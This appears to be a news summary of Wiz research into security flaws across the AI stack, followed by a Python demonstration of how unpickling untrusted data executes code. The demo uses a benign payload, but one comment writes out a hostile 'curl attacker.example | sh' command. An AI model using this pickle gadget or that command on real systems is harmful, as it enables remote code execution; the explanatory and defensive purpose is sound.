Lessons From AI Hacking: Every Model, Every Layer Is Risky

Dark Reading
by Robert Lemos
February 20, 2026
AI-Generated Deep Dive Summary
Two researchers from Wiz, Hillai Ben Sasson and Dan Segev, spent two years probing AI infrastructure for vulnerabilities and found that nearly every major AI platform they targeted had exploitable flaws. Rather than focusing on prompt injection attacks, which dominate many security teams' attention, they stressed the need to address fundamental infrastructure weaknesses across five distinct layers of the AI stack: training, inference, application, framework, and hardware.

The research revealed significant risks at each layer. During model training, data leakage was a major issue: an overly permissive file-sharing link exposed a 38TB dataset that Microsoft used to train its models. In production environments, vulnerabilities turned up in services such as DeepSeek and Ollama, and the widely used Pickle format for storing AI models was exploited to execute arbitrary code. At the application layer, poor security practices in vibe-coding platforms such as Base44 could have given attackers access to private enterprise applications.

The researchers also noted that many AI technologies are introduced without proper threat modeling or security review, leaving vulnerabilities that can be exploited at scale. Their findings underscore the urgent need for businesses adopting AI to prioritize infrastructure security and apply a comprehensive threat model when implementing AI systems. The shift in focus from prompt injection to foundational infrastructure flaws is critical as companies rush to adopt AI technologies, often prioritizing speed over security and leaving themselves exposed to data breaches and unauthorized access. As businesses increasingly rely on AI for innovation and cost savings, the researchers' work serves as a wake-up call to secure AI infrastructure at every layer.
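The Pickle risk the researchers exploited stems from how Python's pickle protocol works: an object can define `__reduce__` to return a callable and arguments, and that callable is invoked when the data is deserialized. Loading an untrusted pickled model therefore runs attacker-chosen code. A minimal sketch, using a harmless `eval` payload as a stand-in for a real attack such as `os.system(...)`:

```python
import pickle

class Malicious:
    # pickle calls __reduce__ at dump time; the (callable, args) pair it
    # returns is executed at load time, so unpickling untrusted data runs
    # whatever code the attacker chose.
    def __reduce__(self):
        # Benign stand-in payload; a real exploit might return
        # (os.system, ("curl attacker.example | sh",)).
        return (eval, ("6 * 7",))

payload = pickle.dumps(Malicious())
result = pickle.loads(payload)  # executes eval("6 * 7") during load
print(result)  # → 42
```

This is why model-distribution ecosystems have been moving toward safer formats such as safetensors, which store only tensor data and cannot embed executable payloads.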